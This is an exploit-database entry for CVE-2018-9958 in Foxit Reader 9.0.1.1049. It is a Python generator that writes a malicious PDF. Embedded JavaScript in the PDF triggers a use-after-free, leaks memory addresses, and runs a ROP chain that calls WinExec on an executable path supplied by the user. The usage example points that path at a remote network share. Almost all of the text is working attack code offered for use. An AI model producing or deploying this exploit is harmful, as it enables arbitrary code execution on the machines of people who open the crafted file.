Foxit Reader 9.0.1.1049 Arbitrary Code Execution

`# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution  
# Date: August 29, 2020  
# Exploit Author: CrossWire  
# Vendor Homepage: https://www.foxitsoftware.com/  
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English  
# Version: 9.0.1.1049  
# Tested on: Microsoft Windows Server 2016 10.0.14393  
# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958)  
  
#!/usr/bin/python3  
  
'''  
===========================================================================  
| PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958) |   
===========================================================================  
| Written by: Kevin Dorland (CrossWire) |  
| Date: 08/29/2020 |  
| |  
| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite |  
| |  
| References: |  
| https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) |  
| https://www.exploit-db.com/exploits/45269 (Metasploit adaptation) |  
| |  
===========================================================================  
'''  
  
  
PDF_TEMPLATE = '''  
%PDF  
1 0 obj  
<</Pages 1 0 R /OpenAction 2 0 R>>  
2 0 obj  
<</S /JavaScript /JS (  
  
var heap_ptr = 0;  
var foxit_base = 0;  
var pwn_array = [];  
  
function prepare_heap(size){  
var arr = new Array(size);  
for(var i = 0; i < size; i++){  
arr[i] = this.addAnnot({type: "Text"});;  
if (typeof arr[i] == "object"){  
arr[i].destroy();  
}  
}  
}  
  
function gc() {  
const maxMallocBytes = 128 * 0x100000;  
for (var i = 0; i < 3; i++) {  
var x = new ArrayBuffer(maxMallocBytes);  
}  
}  
  
function alloc_at_leak(){  
for (var i = 0; i < 0x64; i++){  
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));  
}  
}  
  
function control_memory(){  
for (var i = 0; i < 0x64; i++){  
for (var j = 0; j < pwn_array[i].length; j++){  
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4  
}  
}  
}  
  
function leak_vtable(){  
var a = this.addAnnot({type: "Text"});  
  
a.destroy();  
gc();  
  
prepare_heap(0x400);  
var test = new ArrayBuffer(0x60);  
var stolen = new Int32Array(test);  
  
var leaked = stolen[0] & 0xffff0000;  
foxit_base = leaked - 0x01f50000;  
}  
  
function leak_heap_chunk(){  
var a = this.addAnnot({type: "Text"});  
a.destroy();  
prepare_heap(0x400);  
  
var test = new ArrayBuffer(0x60);  
var stolen = new Int32Array(test);  
  
alloc_at_leak();  
heap_ptr = stolen[1];  
}  
  
function reclaim(){  
var arr = new Array(0x10);  
for (var i = 0; i < arr.length; i++) {  
arr[i] = new ArrayBuffer(0x60);  
var rop = new Int32Array(arr[i]);  
  
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak  
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret  
rop[0x02] = 0x72727272; // junk  
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret  
rop[0x04] = 0xffffffff; // ret of WinExec  
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret  
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec  
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret  
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret  
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret  
rop[0x0a] = foxit_base + 0x0041c6ca; // ret  
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret  
  
//Path to executable  
  
<PATH TO EXECUTABLE>  
  
//End Path to executable  
  
rop[0x17] = 0x00000000; // adios, amigo  
}  
}  
  
function trigger_uaf(){  
var that = this;  
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});  
var arr = [1];  
Object.defineProperties(arr,{  
"0":{  
get: function () {  
  
that.getAnnot(0, "uaf").destroy();  
  
reclaim();  
return 1;  
}  
}  
});  
  
a.point = arr;  
}  
  
function main(){  
leak_heap_chunk();  
leak_vtable();  
control_memory();  
trigger_uaf();  
}  
  
if (app.platform == "WIN"){  
if (app.isFoxit == "Foxit Reader"){  
if (app.appFoxitVersion == "9.0.1.1049"){  
main();  
}  
}  
}  
  
)>> trailer <</Root 1 0 R>>  
'''  
  
import sys  
  
#Enforces 2 hex char byte notation. "0" becomes "0x00"  
def format_byte(b):  
  
if (len(b) > 2) and (b[0:2] == '0x'):  
b = b[2:]  
  
if len(b) == 1:  
b = '0' + b  
  
return '0x' + b  
  
def char2hex(c):  
return format_byte(hex(ord(c)))  
  
#Converts file path into array of eleven 32-bit hex words  
def path_to_machine_code(path,little_endian = True):  
  
print("[+] Encoding Path:",path)  
  
#ensure length  
if len(path) > 44:  
print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")  
exit(-1)  
  
#Copy path into 4 character (32 bit) words (max 11)  
word_array = []  
for i in range(11):  
  
word = ''  
  
if len(path):  
word += path[0:4] if len(path) >= 4 else path  
path = path[len(word):]  
  
if len(word) < 4:  
word += chr(0) * (4 - len(word))  
  
word_array.append(word)  
  
#Convert chars to hex values and format to "0xAABBCCDD" notation  
hex_array = []  
for word in word_array:  
  
#Reverse byte order to fit little endian standard  
if(little_endian): word = word[::-1]  
  
#Write bytes to hex strings  
hex_string = '0x'  
for char in word:  
hex_string += char2hex(char)[2:] #strip the 0x off the byte here  
  
hex_array.append(hex_string)  
  
return hex_array  
  
#writes encoded path to rop array to match template  
def create_rop(hex_arr, start_index = '0c'):  
  
ord_array = []  
  
index = int(start_index,16)  
  
for instruction in hex_arr:  
  
full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};"  
  
ord_array.append(full_instruction)  
  
index += 1  
  
return ('\n'.join(ord_array))  
  
  
  
if __name__ == '__main__':  
  
if len(sys.argv) != 3:  
print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>")  
print("-- EXAMPLES --")  
print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")  
  
exit(-1)  
  
#Parse user args  
EXE_PATH = sys.argv[1]   
PDF_PATH = sys.argv[2]  
  
#Generate hex  
raw_hex = path_to_machine_code(EXE_PATH)  
  
print("[+] Machine Code:")  
for hex_word in raw_hex:  
print(hex_word)  
  
ord_string = create_rop(raw_hex)  
  
print("[+] Instructions to add:")  
print(ord_string)  
  
print("[+] Generating pdf...")  
  
print("\t- Filling template...")  
evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string)  
  
print("\t- Writing file...")  
with open(PDF_PATH,'w') as fd:  
fd.write(evil_pdf)  
  
print("[+] Generated pdf:",PDF_PATH)  
`